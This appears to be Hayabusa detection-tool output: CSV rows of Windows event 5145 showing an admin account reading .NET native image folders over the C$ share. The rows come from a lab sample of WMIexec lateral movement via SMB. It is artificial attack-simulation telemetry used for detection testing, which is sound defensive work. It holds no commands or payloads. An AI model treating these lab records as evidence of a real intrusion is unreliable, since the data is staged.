2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
